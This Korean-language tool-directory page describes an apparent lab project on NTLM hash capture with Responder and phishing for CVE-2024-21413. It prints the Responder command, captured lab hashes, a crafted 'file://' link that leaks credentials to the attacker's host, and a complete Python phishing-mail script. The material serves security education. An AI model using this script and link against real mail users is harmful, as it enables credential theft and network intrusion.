Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413 — 이 프로젝트는 네트워크상의 사용자로부터 NTLM 해시를 캡처하고 이메일을 사용한 피싱 공격을 실행하기 위한 다양한 도구의 사용을 시연하기 위해 만들어졌습니다. 이는 네트워크 인증 취약점과 피싱 방법이 시스템을 손상시키기 위해 어떻게 악용될 수 있는지를 보여줍니다. | Kitploit
도구/GitHubGitHub/artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413
OSINT (Open Source Intelligence)Password CrackingReconnaissanceExploitationPhishingSocial EngineeringLearning & EducationLabs & Practice

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHub
artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413

Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413

이 프로젝트는 네트워크상의 사용자로부터 NTLM 해시를 캡처하고 이메일을 사용한 피싱 공격을 실행하기 위한 다양한 도구의 사용을 시연하기 위해 만들어졌습니다. 이는 네트워크 인증 취약점과 피싱 방법이 시스템을 손상시키기 위해 어떻게 악용될 수 있는지를 보여줍니다.

저장소 보기
1년 전아직 검토되지 않음

Project Goal: 이 프로젝트는 네트워크 상의 사용자로부터 NTLM 해시를 캡처하고 이메일을 사용한 피싱 공격을 실행하기 위한 다양한 도구의 사용을 시연하기 위해 만들어졌습니다. 이를 통해 네트워크 인증 취약점과 피싱 방법이 어떻게 시스템을 손상시키기 위해 악용될 수 있는지 보여줍니다.

Process Description

  1. Responder를 사용한 NTLM 해시 캡처 처음에는 Responder 도구를 사용하여 네트워크를 통해 인증 해시를 캡처했습니다. Responder는 LLMNR, NBT-NS, MDNS와 같은 쿼리를 가로채어 사용자의 NTLM 해시를 수집할 수 있습니다. 이는 캡처된 해시를 사용하여 시스템에 접근하려는 공격에 중요한 단계입니다.

Responder를 시작하기 위해 다음 명령을 실행했습니다:

root@ip-10-10-192-145:~# sudo responder -I ens5

Responder가 ens5 인터페이스에서 수신하도록 구성했습니다. 즉시 인증 요청을 가로채기 시작했으며, THM-MONIKERLINK\tryhackme 및 WORKGROUP\Administrator와 같은 네트워크 사용자의 NTLM 해시를 볼 수 있었습니다. 해시를 캡처할 때 출력은 다음과 같이 나타났습니다:

[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB

이러한 해시는 이후 무차별 대입 공격이나 해시 공격과 같은 공격에 사용될 수 있습니다.

  1. 취약점을 이용한 피싱 이메일 다음으로, 악성 파일에 대한 링크가 포함된 피싱 이메일을 만들었습니다. smtplib 라이브러리를 사용하는 Python 스크립트를 이용하여 피해자의 주소로 이메일을 보냈습니다. 이메일에는 안전해 보이지만 실제로 취약점을 악용하도록 설계된 파일로 연결되는 HTML 링크가 포함되어 있었습니다.

이메일의 피싱 링크는 다음과 같았습니다:

<p><a href="file://10.10.192.145/test!exploit">Click me</a></p>

피싱 이메일을 보내는 데 사용된 전체 Python 스크립트는 다음과 같습니다:

import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr

sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")

html_content = """\

Click me

"""

message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email

msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)

server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()

try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)

try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()

이 스크립트는 악성 링크가 포함된 이메일을 보내며, 이는 잠재적으로 CVE-2024-21413 취약점을 악용할 수 있습니다.

Results 결과적으로 두 가지 핵심 측면을 시연할 수 있었습니다:

  • Responder 도구를 사용한 NTLM 해시 캡처 - 이는 네트워크 인증 공격에 중요한 단계입니다.

  • Python 스크립트를 사용한 이메일을 통한 피싱 및 취약점 악용. 악성 링크가 포함된 피싱 이메일을 보내면 사용자를 속여 시스템 손상으로 이어질 수 있습니다.

이 프로젝트는 네트워크 취약점과 피싱 공격이 어떻게 시스템에 접근하는 데 악용될 수 있는지 보여주었습니다. 또한 강력한 인증 방법과 이메일 트래픽 필터링을 통해 이러한 공격을 방어하는 것의 중요성을 강조했습니다.

도구 다운로드